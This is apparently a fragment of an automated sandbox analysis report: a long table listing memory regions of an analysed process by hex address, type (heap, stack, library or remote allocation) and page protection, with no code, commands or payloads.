||
|
31E6000
|
unkown
|
page read and write
|
||
|
2EEC000
|
heap
|
page read and write
|
||
|
255D000
|
heap
|
page read and write
|
||
|
53A9000
|
direct allocation
|
page read and write
|
||
|
174BFFB0000
|
heap
|
page read and write
|
||
|
5FBF000
|
stack
|
page read and write
|
||
|
B38000
|
heap
|
page read and write
|
||
|
5489000
|
direct allocation
|
page read and write
|
||
|
174C0800000
|
heap
|
page read and write
|
||
|
58F000
|
unkown
|
page read and write
|
||
|
6AC5EFE000
|
unkown
|
page readonly
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
23E0000
|
heap
|
page read and write
|
||
|
3226000
|
heap
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
174C14B1000
|
trusted library allocation
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
174C57E0000
|
trusted library allocation
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
3710000
|
heap
|
page read and write
|
||
|
174C009B000
|
heap
|
page read and write
|
||
|
5D1E000
|
stack
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
174C0E40000
|
trusted library allocation
|
page read and write
|
||
|
101F000
|
stack
|
page read and write
|
||
|
4030000
|
unkown
|
page read and write
|
||
|
2DD0000
|
unkown
|
page readonly
|
||
|
174C5710000
|
remote allocation
|
page read and write
|
||
|
CB4000
|
heap
|
page read and write
|
||
|
578D000
|
direct allocation
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
3188000
|
heap
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
30E0000
|
unkown
|
page read and write
|
||
|
2971000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
432000
|
unkown
|
page readonly
|
||
|
174C00AC000
|
heap
|
page read and write
|
||
|
35C0000
|
unkown
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
357E000
|
heap
|
page read and write
|
||
|
F9D000
|
heap
|
page read and write
|
||
|
6AC53FE000
|
unkown
|
page readonly
|
||
|
580000
|
unkown
|
page read and write
|
||
|
2E05000
|
unkown
|
page read and write
|
||
|
6AC6CFA000
|
stack
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
417000
|
unkown
|
page write copy
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
46B6000
|
trusted library allocation
|
page read and write
|
||
|
DA4000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
174C0730000
|
trusted library section
|
page read and write
|
||
|
296A000
|
heap
|
page read and write
|
||
|
31E7000
|
unkown
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
5BDD000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
174C56A0000
|
trusted library allocation
|
page read and write
|
||
|
DA4000
|
heap
|
page read and write
|
||
|
349F000
|
unkown
|
page read and write
|
||
|
CB4000
|
heap
|
page read and write
|
||
|
174C0078000
|
heap
|
page read and write
|
||
|
50AE000
|
direct allocation
|
page read and write
|
||
|
174C5884000
|
heap
|
page read and write
|
||
|
381000
|
unkown
|
page write copy
|
||
|
F9F000
|
heap
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
174C0F90000
|
trusted library section
|
page readonly
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
798000
|
heap
|
page read and write
|
||
|
27C3000
|
heap
|
page read and write
|
||
|
E44000
|
heap
|
page read and write
|
||
|
174C0F40000
|
trusted library section
|
page readonly
|
||
|
5580000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
41BD000
|
unkown
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
57C0000
|
unkown
|
page read and write
|
||
|
D16000
|
heap
|
page read and write
|
||
|
D10000
|
heap
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
D16000
|
heap
|
page read and write
|
||
|
2752000
|
heap
|
page read and write
|
||
|
4CEE000
|
direct allocation
|
page read and write
|
||
|
6FE59000
|
unkown
|
page readonly
|
||
|
174C0F70000
|
trusted library section
|
page readonly
|
||
|
31D4000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
6AC5CFE000
|
unkown
|
page readonly
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
332F000
|
heap
|
page read and write
|
||
|
174C5710000
|
remote allocation
|
page read and write
|
||
|
518000
|
unkown
|
page readonly
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
3620000
|
direct allocation
|
page read and write
|
||
|
368C000
|
heap
|
page read and write
|
||
|
FE7000
|
heap
|
page read and write
|
||
|
6AC5AFB000
|
stack
|
page read and write
|
||
|
31E7000
|
unkown
|
page read and write
|
||
|
495C000
|
heap
|
page read and write
|
||
|
3382000
|
heap
|
page read and write
|
||
|
E30000
|
heap
|
page read and write
|
||
|
5524000
|
trusted library allocation
|
page read and write
|
||
|
2971000
|
heap
|
page read and write
|
||
|
174C5560000
|
trusted library allocation
|
page read and write
|
||
|
F1E000
|
stack
|
page read and write
|
||
|
174C5865000
|
heap
|
page read and write
|
||
|
2D70000
|
unkown
|
page readonly
|
||
|
174C5800000
|
heap
|
page read and write
|
||
|
174C5861000
|
heap
|
page read and write
|
||
|
2CFA000
|
stack
|
page read and write
|
||
|
6AC69FE000
|
unkown
|
page readonly
|
||
|
5789000
|
direct allocation
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
ECE000
|
stack
|
page read and write
|
||
|
27E0000
|
unkown
|
page readonly
|
||
|
6AC607E000
|
stack
|
page read and write
|
||
|
31E7000
|
unkown
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
392000
|
unkown
|
page write copy
|
||
|
52E7000
|
heap
|
page read and write
|
||
|
30FA000
|
stack
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
52E3000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
2D3A000
|
stack
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
3595000
|
heap
|
page read and write
|
||
|
4C79000
|
direct allocation
|
page read and write
|
||
|
514A000
|
trusted library allocation
|
page read and write
|
||
|
35A3000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
DA4000
|
heap
|
page read and write
|
||
|
2951000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
F5B000
|
heap
|
page read and write
|
||
|
6FE20000
|
unkown
|
page readonly
|
||
|
F3F000
|
heap
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
3B0D000
|
trusted library allocation
|
page read and write
|
||
|
D96000
|
heap
|
page read and write
|
||
|
27A7000
|
heap
|
page read and write
|
||
|
D96000
|
heap
|
page read and write
|
||
|
DA4000
|
heap
|
page read and write
|
||
|
31E2000
|
unkown
|
page read and write
|
||
|
174C0073000
|
heap
|
page read and write
|
||
|
5660000
|
direct allocation
|
page read and write
|
||
|
D5F000
|
heap
|
page read and write
|
||
|
2E2C000
|
stack
|
page read and write
|
||
|
57FE000
|
direct allocation
|
page read and write
|
||
|
6AC6AFE000
|
stack
|
page read and write
|
||
|
E40000
|
heap
|
page read and write
|
||
|
29C000
|
stack
|
page read and write
|
||
|
3181000
|
heap
|
page read and write
|
||
|
4174000
|
unkown
|
page read and write
|
||
|
2B30000
|
unkown
|
page read and write
|
||
|
40FC000
|
unkown
|
page read and write
|
||
|
6C938000
|
unkown
|
page readonly
|
||
|
E06000
|
heap
|
page read and write
|
||
|
3634000
|
heap
|
page read and write
|
||
|
2970000
|
heap
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
6AC60FE000
|
unkown
|
page readonly
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
323A000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
3336000
|
heap
|
page read and write
|
||
|
2F70000
|
unkown
|
page read and write
|
||
|
2D94000
|
heap
|
page read and write
|
||
|
EDF000
|
stack
|
page read and write
|
||
|
336E000
|
heap
|
page read and write
|
||
|
174C5590000
|
trusted library allocation
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
5CE000
|
stack
|
page read and write
|
||
|
D13000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
320D000
|
heap
|
page read and write
|
||
|
D16000
|
heap
|
page read and write
|
||
|
3111000
|
unkown
|
page read and write
|
||
|
174C0B01000
|
trusted library allocation
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
DAC000
|
heap
|
page read and write
|
||
|
29F0000
|
unkown
|
page readonly
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
D96000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
174C0013000
|
heap
|
page read and write
|
||
|
5660000
|
direct allocation
|
page read and write
|
||
|
4F10000
|
direct allocation
|
page read and write
|
||
|
2951000
|
heap
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
DA4000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
CB4000
|
heap
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
6AC5BFE000
|
unkown
|
page readonly
|
||
|
2FF6000
|
unkown
|
page read and write
|
||
|
32A9000
|
heap
|
page read and write
|
||
|
110F000
|
stack
|
page read and write
|
||
|
286B000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
2AA0000
|
heap
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
EBE000
|
heap
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
2C91000
|
heap
|
page read and write
|
||
|
324E000
|
unkown
|
page read and write
|
||
|
6AC5C7E000
|
stack
|
page read and write
|
||
|
4FE4000
|
heap
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
2D50000
|
unkown
|
page readonly
|
||
|
5401000
|
unkown
|
page read and write
|
||
|
FCE000
|
stack
|
page read and write
|
||
|
3368000
|
heap
|
page read and write
|
||
|
D17000
|
heap
|
page read and write
|
||
|
D17000
|
heap
|
page read and write
|
||
|
4F1C000
|
trusted library allocation
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2C04000
|
heap
|
page read and write
|
||
|
32AD000
|
heap
|
page read and write
|
||
|
53AD000
|
direct allocation
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
6AC59FE000
|
unkown
|
page readonly
|
||
|
D90000
|
heap
|
page read and write
|
||
|
E44000
|
heap
|
page read and write
|
||
|
31D4000
|
unkown
|
page read and write
|
||
|
3B09000
|
trusted library allocation
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
EC3000
|
heap
|
page read and write
|
||
|
5D1000
|
unkown
|
page read and write
|
||
|
3001000
|
unkown
|
page read and write
|
||
|
C34000
|
trusted library allocation
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
548D000
|
direct allocation
|
page read and write
|
||
|
DDE000
|
stack
|
page read and write
|
||
|
174BFFF0000
|
trusted library allocation
|
page read and write
|
||
|
6C945000
|
unkown
|
page read and write
|
||
|
5360000
|
direct allocation
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
4070000
|
unkown
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
3760000
|
heap
|
page read and write
|
||
|
2873000
|
heap
|
page read and write
|
||
|
4CE2000
|
heap
|
page read and write
|
||
|
2867000
|
heap
|
page read and write
|
||
|
5C9000
|
unkown
|
page read and write
|
||
|
6AC5DFE000
|
unkown
|
page readonly
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
2AB8000
|
heap
|
page read and write
|
||
|
FA1000
|
heap
|
page read and write
|
||
|
F50000
|
heap
|
page read and write
|
||
|
51C0000
|
heap
|
page read and write
|
||
|
E53000
|
heap
|
page read and write
|
||
|
2AA7000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
6AC56FC000
|
stack
|
page read and write
|
||
|
5A20000
|
unkown
|
page read and write
|
||
|
2A09000
|
heap
|
page read and write
|
||
|
5E1E000
|
stack
|
page read and write
|
||
|
DA0000
|
heap
|
page read and write
|
||
|
174C002B000
|
heap
|
page read and write
|
||
|
38E0000
|
heap
|
page read and write
|
||
|
F3F000
|
heap
|
page read and write
|
||
|
552B000
|
trusted library allocation
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
308E000
|
unkown
|
page read and write
|
||
|
4C7D000
|
direct allocation
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
2551000
|
heap
|
page read and write
|
||
|
4A1000
|
unkown
|
page execute read
|
||
|
E44000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
70131000
|
unkown
|
page read and write
|
||
|
D16000
|
heap
|
page read and write
|
||
|
6AC4D5B000
|
stack
|
page read and write
|
||
|
174C0102000
|
heap
|
page read and write
|
||
|
E5F000
|
heap
|
page read and write
|
||
|
174C5570000
|
trusted library allocation
|
page read and write
|
||
|
F42000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2E05000
|
unkown
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
174C006E000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
3100000
|
unkown
|
page read and write
|
||
|
4CBD000
|
direct allocation
|
page read and write
|
||
|
337F000
|
stack
|
page read and write
|
||
|
5789000
|
direct allocation
|
page read and write
|
||
|
388000
|
unkown
|
page readonly
|
||
|
174C14E0000
|
trusted library allocation
|
page read and write
|
||
|
3221000
|
heap
|
page read and write
|
||
|
584000
|
unkown
|
page read and write
|
||
|
4BB9000
|
heap
|
page read and write
|
||
|
3237000
|
heap
|
page read and write
|
||
|
3FF0000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
4EC000
|
stack
|
page read and write
|
||
|
65E000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
174C0902000
|
heap
|
page read and write
|
||
|
E44000
|
heap
|
page read and write
|
||
|
F7E000
|
heap
|
page read and write
|
||
|
CFE000
|
stack
|
page read and write
|
||
|
2D00000
|
unkown
|
page readonly
|
||
|
F20000
|
heap
|
page read and write
|
||
|
3F68000
|
unkown
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
5640000
|
unkown
|
page read and write
|
||
|
6AC63FE000
|
unkown
|
page readonly
|
||
|
343A000
|
heap
|
page read and write
|
||
|
32DA000
|
heap
|
page read and write
|
||
|
29BB000
|
stack
|
page read and write
|
||
|
D99000
|
heap
|
page read and write
|
||
|
478000
|
unkown
|
page readonly
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
4CDC000
|
heap
|
page read and write
|
||
|
2430000
|
direct allocation
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
F83000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
6AC62FE000
|
unkown
|
page readonly
|
||
|
33F6000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2C3B000
|
stack
|
page read and write
|
||
|
6AC5D7E000
|
stack
|
page read and write
|
||
|
4839000
|
heap
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
174C584C000
|
heap
|
page read and write
|
||
|
59F0000
|
heap
|
page read and write
|
||
|
3221000
|
heap
|
page read and write
|
||
|
70131000
|
unkown
|
page read and write
|
||
|
2DE0000
|
unkown
|
page readonly
|
||
|
522000
|
unkown
|
page write copy
|
||
|
3100000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
2D10000
|
unkown
|
page readonly
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
2AA0000
|
heap
|
page read and write
|
||
|
39E0000
|
trusted library allocation
|
page read and write
|
||
|
2AAB000
|
heap
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
174C5819000
|
heap
|
page read and write
|
||
|
3672000
|
heap
|
page read and write
|
||
|
2D7E000
|
unkown
|
page read and write
|
||
|
3305000
|
heap
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
4A19000
|
trusted library allocation
|
page read and write
|
||
|
174C5820000
|
heap
|
page read and write
|
||
|
174C0900000
|
heap
|
page read and write
|
||
|
F5B000
|
heap
|
page read and write
|
||
|
5179000
|
direct allocation
|
page read and write
|
||
|
174C583F000
|
heap
|
page read and write
|
||
|
FBA000
|
heap
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
6AC68FE000
|
unkown
|
page readonly
|
||
|
41A3000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
322E000
|
unkown
|
page read and write
|
||
|
174C008B000
|
heap
|
page read and write
|
||
|
6AC55FE000
|
unkown
|
page readonly
|
||
|
F28000
|
heap
|
page read and write
|
||
|
31E8000
|
heap
|
page read and write
|
||
|
6C910000
|
unkown
|
page readonly
|
||
|
4CB9000
|
direct allocation
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
30DE000
|
unkown
|
page read and write
|
||
|
174C5854000
|
heap
|
page read and write
|
||
|
174C00AE000
|
heap
|
page read and write
|
||
|
A85000
|
heap
|
page read and write
|
||
|
5050000
|
direct allocation
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
4042000
|
unkown
|
page read and write
|
||
|
E44000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
359E000
|
unkown
|
page read and write
|
||
|
3280000
|
direct allocation
|
page read and write
|
||
|
6AC61FE000
|
stack
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
47D000
|
stack
|
page read and write
|
||
|
174C5571000
|
trusted library allocation
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
3FA0000
|
unkown
|
page read and write
|
||
|
DA4000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
174C0F50000
|
trusted library section
|
page readonly
|
||
|
940000
|
heap
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
4002000
|
unkown
|
page read and write
|
||
|
2AA9000
|
heap
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
CB4000
|
heap
|
page read and write
|
||
|
5EBE000
|
stack
|
page read and write
|
||
|
3F30000
|
unkown
|
page read and write
|
||
|
100E000
|
stack
|
page read and write
|
||
|
31E7000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
5711000
|
unkown
|
page read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
DF3000
|
heap
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
57F000
|
unkown
|
page write copy
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2DEF000
|
unkown
|
page read and write
|
||
|
6AC697E000
|
stack
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
8C9000
|
unkown
|
page read and write
|
||
|
CB4000
|
heap
|
page read and write
|
||
|
296D000
|
heap
|
page read and write
|
||
|
31F1000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
DEE000
|
heap
|
page read and write
|
||
|
31EF000
|
unkown
|
page read and write
|
||
|
174C0089000
|
heap
|
page read and write
|
||
|
33B0000
|
heap
|
page read and write
|
||
|
2DD0000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
31E7000
|
unkown
|
page read and write
|
||
|
2A1D000
|
heap
|
page read and write
|
||
|
3B7E000
|
trusted library allocation
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
CB4000
|
heap
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
174C5570000
|
trusted library allocation
|
page read and write
|
||
|
5400000
|
unkown
|
page read and write
|
||
|
47DA000
|
heap
|
page read and write
|
||
|
3104000
|
unkown
|
page read and write
|
||
|
471000
|
unkown
|
page write copy
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2A0B000
|
heap
|
page read and write
|
||
|
2551000
|
heap
|
page read and write
|
||
|
58E000
|
unkown
|
page write copy
|
||
|
49E000
|
stack
|
page read and write
|
||
|
2FF4000
|
unkown
|
page read and write
|
||
|
31D6000
|
unkown
|
page read and write
|
||
|
CBE000
|
stack
|
page read and write
|
||
|
4131000
|
unkown
|
page read and write
|
||
|
4019000
|
unkown
|
page read and write
|
||
|
6AC54FE000
|
stack
|
page read and write
|
||
|
174C55B0000
|
trusted library allocation
|
page read and write
|
||
|
D86000
|
heap
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
8A2000
|
unkown
|
page write copy
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
2A07000
|
heap
|
page read and write
|
||
|
FBD000
|
heap
|
page read and write
|
There are 878 hidden memdumps, click here to show them.